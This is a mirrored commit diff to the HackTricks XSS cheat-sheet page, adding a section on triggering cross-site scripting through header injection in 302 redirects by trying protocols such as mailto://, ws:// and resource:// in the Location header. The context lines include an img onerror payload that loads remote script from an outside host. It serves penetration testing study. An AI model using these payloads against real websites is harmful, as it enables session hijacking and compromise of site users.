mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [master] one page modified
This commit is contained in:
parent
8d3ae0eb1d
commit
202b5b7c92
1 changed files with 7 additions and 0 deletions
|
@ -476,6 +476,13 @@ A XSS occurs.
|
|||
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
|
||||
```
|
||||
|
||||
### XSS with header injection in a 302 response
|
||||
|
||||
If you find that you can **inject headers in a 302 Redirect response** you could try to **make the browser execute arbitrary JavaScript**. This is **not trivial** as modern browsers do not interpret the HTTP response body if the HTTP response status code is a 302, so just a cross-site scripting payload is useless.
|
||||
|
||||
In [**this report**](https://www.gremwell.com/firefox-xss-302) you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body.
|
||||
Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`.
|
||||
|
||||
### Obfuscation & Advanced Bypass
|
||||
|
||||
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
|
||||
|
|
Loading…
Reference in a new issue